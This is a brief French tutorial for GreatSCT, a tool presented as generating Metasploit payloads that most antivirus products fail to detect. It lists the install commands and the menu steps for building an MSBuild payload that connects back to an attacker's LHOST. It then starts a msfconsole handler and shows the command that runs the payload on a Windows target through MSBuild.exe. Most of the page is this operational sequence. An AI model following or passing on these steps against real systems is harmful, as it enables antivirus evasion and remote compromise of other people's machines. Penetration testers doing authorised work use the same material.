GreatSCT

Introduction

GreatSCT est un outil permettant de générer des payloads Metasploit qui ne sont pas détectés par la majorité des Antivirus.

Installation

L’installation se fait simplement à partir du dépôt Github.

apt-get -y install git
git clone https://github.com/GreatSCT/GreatSCT.git
cd GreatSCT/
cd setup
sudo ./setup.sh -c

Usage

L’outil se lance à l’aide de la commande ./GreatSCT.py. Son usage se fait ensuite via les menus.

MSBuild payloads

./GreatSCT.py
> use 1
> list
> use 9
> set LHOST <IP>
> generate

Après avoir généré le payload, il est nécessaire de lancer un handler Metasploit:

msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

Puis de déposer le payload sur la cible Windows avant d’exécuter:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe .\payload.xml